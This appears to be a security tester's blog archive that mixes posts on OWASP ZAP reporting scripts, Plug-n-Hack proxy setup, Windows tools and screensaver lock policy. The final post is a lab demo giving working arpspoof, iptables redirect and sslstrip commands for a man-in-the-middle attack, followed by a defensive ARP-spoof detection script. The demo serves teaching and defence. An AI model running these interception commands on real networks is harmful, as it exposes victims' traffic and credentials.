Practical Security Testing For Developers Using OWASP ZAP at Dot Net Bangalore 3rd meet up on Feb 21 2015
Title: Practical Security Testing for Developers using OWASP ZAP
Abstract: Every time an application faces the world wide web, it inherently becomes vulnerable to attacks. The attackers could be script kiddies or joyriders, ranging from hobbyists to the downright hostile. The earlier in the development cycle you find the vulnerabilities, the easier they are to fix and test. OWASP ZAP is a free and open source penetration testing tool for finding vulnerabilities in web applications; widely used by security professionals, it is also ideal for anyone new to web application security and includes features specifically aimed at developers. This session demonstrates some attacks against web applications and how OWASP ZAP can be used to find those vulnerabilities, both manually and from automated builds.
Gist: See live attacks against web applications and how OWASP ZAP can be used to find those vulnerabilities, both manually and from automated builds.
Time & Venue: 21 Feb 2015 @ Dot Net Bangalore 2nd meet up
OK, maybe the title is a bit misleading. The post below shows a few workarounds you can use to generate (or mimic) an HTML report when running OWASP ZAP automated in headless mode.
Zed Attack Proxy (ZAP), as of the 2.3.1 stable release, can generate an XML report and an HTML report of the alerts found. Both are available from the UI via the Report menu.
One of ZAP's distinctive features is the REST API, which helps automate scans. When ZAP runs in daemon mode and is driven through the REST API, there are a number of ways to harvest the alerts it identified.
Here are a couple of them:
- alerts based on id (http://localhost:7070/UI/core/view/alert/)
- alerts for the baseurl (http://localhost:7070/UI/core/view/alerts/)
- xmlreport (http://localhost:7070/UI/core/other/xmlreport/) [Same as clicking Report –> Generate Xml Report…]
Using the API and your favourite programming language, you can gather the alerts and decide what to do with them.
One convenience is simply pulling an HTML report out of the scan and mailing it to the application owners (or ourselves) so the findings can be fixed. There is an enhancement request open on the project's issue page – https://code.google.com/p/zaproxy/issues/detail?id=1355
Until the feature ships in the next stable release, I decided to live with a couple of workarounds: one in Python and one as an executable (written in C#). They are not perfect in terms of formatting, but they are close enough to the original HTML report generated through the ZAP UI.
Download from here – https://github.com/gmaran23/HtmlReportThroughZapAPIs
A Python script injects an XSLT stylesheet reference into the XML report file generated through the API. Use the sample function to insert the sample stylesheet (ZapReport.xslt) into the generated XML file. Needless to say, ZapReport.xslt and the XML report file should be in the same location.
If you need to email the XML report, zip it together with the XSLT file, so that when unzipped the XSLT file resides in the same location as the XML file.
When the XML file is opened in Firefox or IE, you see the formatting in action! (It does not work in Chrome, though.)
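The two steps above (pulling the alerts out of the API's XML report and making that XML render as an HTML report via a stylesheet) can be done in a few lines of plain Python. The following is an added example, not the script from the repository linked here: it injects an xml-stylesheet processing instruction pointing at ZapReport.xslt, and it counts alerts per risk level so an automated build can decide whether to fail. The sample report is constructed for the example, and the element names (alertitem, riskcode, alert) follow the ZAP 2.x xmlreport layout as an assumption; check them against your own ZAP version's output.

```python
"""Added example (not the page's script): post-process a ZAP XML report.

inject_xslt()      - add an <?xml-stylesheet?> PI so a browser renders the report
                     with ZapReport.xslt sitting next to the XML file
summarize_alerts() - count alertitems per risk level for a build gate
Element names follow the ZAP 2.x xmlreport layout (assumption for other versions).
"""
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample in the shape of the /UI/core/other/xmlreport/ output.
SAMPLE_REPORT = """<?xml version="1.0"?>
<OWASPZAPReport version="2.3.1" generated="Sat, 21 Feb 2015 10:00:00">
  <site name="http://localhost:8080" host="localhost" port="8080" ssl="false">
    <alerts>
      <alertitem>
        <pluginid>40012</pluginid>
        <alert>Cross Site Scripting (Reflected)</alert>
        <riskcode>3</riskcode>
        <confidence>2</confidence>
        <riskdesc>High (Medium)</riskdesc>
        <uri>http://localhost:8080/products?q=test</uri>
      </alertitem>
      <alertitem>
        <pluginid>10016</pluginid>
        <alert>Web Browser XSS Protection Not Enabled</alert>
        <riskcode>1</riskcode>
        <confidence>2</confidence>
        <riskdesc>Low (Medium)</riskdesc>
        <uri>http://localhost:8080/</uri>
      </alertitem>
      <alertitem>
        <pluginid>10021</pluginid>
        <alert>X-Content-Type-Options Header Missing</alert>
        <riskcode>1</riskcode>
        <confidence>2</confidence>
        <riskdesc>Low (Medium)</riskdesc>
        <uri>http://localhost:8080/</uri>
      </alertitem>
    </alerts>
  </site>
</OWASPZAPReport>
"""

RISK_NAMES = {0: "Informational", 1: "Low", 2: "Medium", 3: "High"}
RISK_ORDER = ["Informational", "Low", "Medium", "High"]
_STYLESHEET_PI = re.compile(r"<\?xml-stylesheet\b[^?]*\?>")
_XML_DECL = re.compile(r"\s*<\?xml\s[^?]*\?>")


def inject_xslt(xml_text, xslt_href="ZapReport.xslt"):
    """Return xml_text with a stylesheet PI right after the XML declaration
    (or at the top if there is none). Idempotent: an existing stylesheet PI
    is replaced instead of being duplicated."""
    pi = '<?xml-stylesheet type="text/xsl" href="%s"?>' % xslt_href
    if _STYLESHEET_PI.search(xml_text):
        return _STYLESHEET_PI.sub(pi, xml_text, count=1)
    decl = _XML_DECL.match(xml_text)
    if decl:
        end = decl.end()
        return xml_text[:end] + "\n" + pi + xml_text[end:]
    return pi + "\n" + xml_text


def summarize_alerts(xml_text):
    """Count alertitems per risk name; bad or missing riskcodes count as 'Unknown'."""
    root = ET.fromstring(xml_text)   # the PI, if present, is ignored by the parser
    counts = Counter()
    for item in root.iter("alertitem"):
        try:
            name = RISK_NAMES.get(int(item.findtext("riskcode")), "Unknown")
        except (TypeError, ValueError):
            name = "Unknown"
        counts[name] += 1
    return dict(counts)


def exceeds_threshold(summary, max_risk="Medium"):
    """True if any alert is rated strictly above max_risk (a simple build gate)."""
    limit = RISK_ORDER.index(max_risk)
    return any(summary.get(name, 0) for name in RISK_ORDER[limit + 1:])


if __name__ == "__main__":
    styled = inject_xslt(SAMPLE_REPORT)
    summary = summarize_alerts(styled)
    print(styled.splitlines()[1])
    print(summary, "fail build:", exceeds_threshold(summary))
```

In a real pipeline, fetch the report text from the xmlreport API URL, write `inject_xslt(text)` to a file beside ZapReport.xslt, and use `exceeds_threshold` to decide the build result; the thresholds are a policy choice, so keep them in the build configuration rather than in the script.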
Another XSLT template is available from https://code.google.com/p/zaproxy/source/browse/trunk/src/xml/report.html.xsl
Use the command-line program XmlToHtmlWithXSLT.exe (requires .NET 4.0) as below to obtain an HTML report as output.
If you don't have .NET 4.0, use the source below to recompile for any .NET version.
Until the enhancement request (https://code.google.com/p/zaproxy/issues/detail?id=1355) is completed, these are some workarounds that I personally can live with; maybe you can too, for your automation needs.
Plug-n-Hack proposes new standards for integrating security tools with browsers, enabling communication between them. OWASP ZAP has built-in support for Plug-n-Hack (pnh), which lets you configure Firefox to change its proxy settings so that ZAP can watch the Firefox traffic.
Configuration is child's play. Point your browser to the ZAP proxy address, follow the instructions, and you are done, just like in the gif image below.
This changes Firefox to use the proxy configuration provided via the http://localhost:7070/proxy.pac file.
But suppose that, out of curiosity, you change the Firefox proxy settings to No Proxy, Auto-detect proxy settings for this network, or Use system proxy settings. Then the Firefox traffic is no longer proxied through ZAP, which is expected, right? That works just fine.
However, when you want Firefox traffic proxied through ZAP again, you would paste the ZAP pnh address (http://localhost:7070/pnh) into Firefox again, and Firefox would then say: A provider with this name has already been configured
What is your expectation now?
I don't know about you, but as a user my expectation when I pasted the http://localhost:7070/pnh URL into Firefox was that it should configure my browser to route its traffic via ZAP. But that does not happen.
How to fix?
You can override the proxy settings yourself. Or you can use pnh to clear and remove the existing configuration and then point Firefox to http://localhost:7070/pnh again.
Press Shift + F2 in Firefox and then run these two commands:
Windows changes with every version and the UI gets more and more twisted, but for a computer user who works with the command line for administrative tasks, things are pretty much the same.
If you want to gather the list of MAC addresses on a particular computer, run either of the commands below:
2. Look for them in the output of ipconfig /all.
Originally posted on chentiangemalc:
Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!
By version 2.01 it had been renamed to HandleEx, added some more process properties and a kill feature.
It wasn’t until 16 June 2001, when Version 5.0 came out, that it got renamed to Process Explorer. (I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case, as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:
However an open source project has been working on a competing product since…
Originally posted on chentiangemalc:
Continuing from Part 1 here http://chentiangemalc.wordpress.com/2011/06/13/process-explorer-vs-process-hackerpart-1-of-2/ we will now compare more advanced features of Process Explorer & Process Hacker.
Run As Options
Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”, while Process Hacker has “Run”, “Run As Limited User”, and “Run As”.
In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.
However Process Hacker’s Run As is the most powerful with many special options…
User name can be any standard user name but also can include special accounts such as:
We can also select what “type”
Specific sessions can be targeted
as well as Desktops…
Finding Open Handles/DLLs
In Process Hacker this is found via Hacker | Find Handles or DLLs menu option, in Process Explorer it is via Find | Find Handle or DLL
The main difference here is…
This article was originally published for www.prowareness.com and could be located at http://www.prowareness.com/blog/does-your-autolock-domain-workstation-policy-fail-sometimes-but-why/
The “Password Protect Screensaver” and “Screen Saver Timeout” settings controlled by group policy make the screen saver kick in after the specified interval of inactivity and, on resume, display the logon screen, so the workstation has to be unlocked.
The normal procedure, if you are doing it for the first time, is to run GPUPDATE /FORCE. The policy then works as expected; however, if some users or managers keep complaining that their workstation does not get locked after the specified interval, check whether any of the exceptions below apply.
- There is a video playing on YouTube or any website that uses a Flash-based or HTML5 video player. This should be the active window.
- There is a video playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
- There is an audio playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
- There is an automated test running. Desktop app automation or browser automation.
- A PowerPoint slideshow in progress.
The moment a computer is joined to a domain the policy becomes effective, so if it did not work the cause is either one of the above exceptions or the computer not being part of the domain. The exceptions exist because those activities tell the operating system that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen gets locked while you are enjoying a movie or are in the middle of a presentation.
OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)
0. Make sure you are proxying via Zap (I love FoxyProxy)
1. Identify the session cookie
1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]
1.2 go do some browsing
2. Set an active session from the Http Sessions tab
3. Identify and exclude the Log off request from the spider (and from the scanner and proxy, if required)
Good luck with your Ajax spidering in ZAP!
You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?
Victim – Windows 7 – 192.168.100.11
Attacker – Kali linux – 192.168.100.215
arpspoof gateway – 192.168.100.1
• Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
• Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.100.11 192.168.100.1
• Set up iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip.py -l <listenPort>
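From the victim's side, the arpspoof step above leaves a visible trace: the gateway's entry in the ARP cache suddenly carries the attacker's MAC, and that MAC answers for two IPs at once. The following is an added example, not part of the original post, that parses constructed `arp -a` style snapshots (Windows layout, using the lab addresses from the demo above) and flags both symptoms; feeding it real, periodically captured `arp -a` output is left to the reader.

```python
"""Added example (not from the page): detect the ARP-cache symptoms of a
gateway spoof. Snapshots are constructed `arp -a` style text; the lab
addresses match the demo (victim .11, attacker .215, gateway .1)."""
import re
from collections import defaultdict

# Constructed snapshots: before and after the gateway entry is poisoned.
SNAPSHOTS = [
    """Interface: 192.168.100.11 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         00-11-22-33-44-55     dynamic
  192.168.100.215       aa-bb-cc-dd-ee-ff     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
""",
    """Interface: 192.168.100.11 --- 0xb
  Internet Address      Physical Address      Type
  192.168.100.1         aa-bb-cc-dd-ee-ff     dynamic
  192.168.100.215       aa-bb-cc-dd-ee-ff     dynamic
  192.168.100.255       ff-ff-ff-ff-ff-ff     static
""",
]

ARP_LINE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.I,
)


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` style output, MACs normalised to lower-case colon form."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, _kind = m.groups()
            table[ip] = mac.lower().replace("-", ":")
    return table


def arp_anomalies(snapshots, watched_ips):
    """Walk successive snapshots and report:
    - ('mac-changed', ip, old_mac, new_mac) when a watched IP (e.g. the gateway)
      switches hardware address between snapshots
    - ('duplicate-mac', mac, ips) when one MAC answers for several IPs
    Each finding is prefixed with the snapshot index it was seen in."""
    findings = []
    previous = {}
    for index, text in enumerate(snapshots):
        table = parse_arp_table(text)
        for ip in watched_ips:
            old, new = previous.get(ip), table.get(ip)
            if old and new and old != new:
                findings.append((index, "mac-changed", ip, old, new))
        by_mac = defaultdict(list)
        for ip, mac in table.items():
            by_mac[mac].append(ip)
        for mac, ips in by_mac.items():
            if len(ips) > 1:
                findings.append((index, "duplicate-mac", mac, tuple(sorted(ips))))
        previous = table
    return findings


if __name__ == "__main__":
    for finding in arp_anomalies(SNAPSHOTS, ["192.168.100.1"]):
        print(finding)
```

A static ARP entry for the gateway, Dynamic ARP Inspection on managed switches, and HSTS on the server side are the usual mitigations; this check is only a cheap way to notice that something is wrong on a host that has none of them.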